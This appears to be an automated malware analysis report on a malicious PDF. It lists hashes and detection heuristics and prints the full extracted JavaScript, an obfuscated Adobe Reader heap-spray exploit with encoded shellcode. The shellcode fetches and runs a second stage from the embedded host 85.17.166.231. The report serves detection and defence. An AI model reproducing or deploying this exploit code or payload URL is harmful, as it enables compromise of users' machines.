Malicious PDF — malware analysis report

Static analysis result for SHA-256 dc8730e170bbdd14…

MALICIOUS

PDF

2.9 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2012-06-30
MD5: b2cdf2e1aee00a75b60cea0d724c448b SHA-1: d2557e05ff1dbdb183298607a9bdeba35c208f50 SHA-256: dc8730e170bbdd14cd55b06b68bd87e818d5efbc1e6460c2823868b472580022
250 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       var Kg8CRs7 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u794 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://85.17.166.231/gtest2/load.php?id=0&e=01&sid= Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36A 3120 bytes
SHA-256: e7ec71f08ec797539fc4e34cadec5bfcc5eee1d166224c878ea162bf0bba05ef
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function G9rhAVV1za2O() {	var QFfhlYk = new Array(); 
		function hqn3WPz1KSjTJR(vxdoYfDgwSMdD, vXsELukk) { 
			while (vxdoYfDgwSMdD.length*2<vXsELukk){vxdoYfDgwSMdD += vxdoYfDgwSMdD;} 
			vxdoYfDgwSMdD = vxdoYfDgwSMdD.substring(0,vXsELukk/2);
			return vxdoYfDgwSMdD; 
		}

		function X6MUZgwCVtqK() { 
			var oX9S1U6EPS = 0x0c0c0c0c; 
			var Kg8CRs7 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u382F%u2E35%u3731%u312E%u3636%u322E%u3133%u672F%u6574%u7473%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u2630%u3D65%u3130%u7326%u6469%u003D");
			var jYbdm17ZIn = 0x400000;
			var NEYbQX685 = Kg8CRs7.length * 2;
			var vXsELukk = jYbdm17ZIn - (NEYbQX685+0x38);
			var vxdoYfDgwSMdD = unescape("%u9090%u9090");
			vxdoYfDgwSMdD = hqn3WPz1KSjTJR(vxdoYfDgwSMdD, vXsELukk);
			var yovHOwGUUM44 = (oX9S1U6EPS - 0x400000)/jYbdm17ZIn;
			
			for (var FTgXAdjgWa1y7Y=0;FTgXAdjgWa1y7Y<yovHOwGUUM44;FTgXAdjgWa1y7Y++) { 
				QFfhlYk[FTgXAdjgWa1y7Y] = vxdoYfDgwSMdD + Kg8CRs7;
			}
		}

		function TqynPGa6loe() {
			var DBSNGi8 = app.viewerVersion.toString();
			DBSNGi8 = DBSNGi8.replace(/\D/g,"");
			var kPSafx63191 = new Array(DBSNGi8.charAt(0),DBSNGi8.charAt(1),DBSNGi8.charAt(2));
			var Q1mo1k = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
			if ((kPSafx63191[0] == 8 &&
			((kPSafx63191[1] == 1 && kPSafx63191[2] < 2) || kPSafx63191[1] < 1)) || 
			(kPSafx63191[0] == 7 && kPSafx63191[1] < 1) || 
			(kPSafx63191[0] < 7)) {
			        var oXffC59mk6s = Collab;
				X6MUZgwCVtqK();
				var byVOE6U1u0N0Lp = unescape("%u0c0c%u0c0c");
				var YzOtzI3N = "c24ol2la572bS8to2445r5e00";
				while(byVOE6U1u0N0Lp.length < 44952) byVOE6U1u0N0Lp += byVOE6U1u0N0Lp;
				this[YzOtzI3N.replace(new RegExp(/\d/g),"")] = oXffC59mk6s[Q1mo1k.replace(new RegExp(/\d/g),"")](                  {subj:            "",        msg:              byVOE6U1u0N0Lp});
			} 
		}
		TqynPGa6loe();}
javascript_obj0013_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x36A 464 bytes
SHA-256: d792dbee0b7e8970c65ec781f7c0e1244e3d0b09e1740c3fa42d8f511e8b9028

Open this report in the interactive analyzer, or submit your own file for analysis.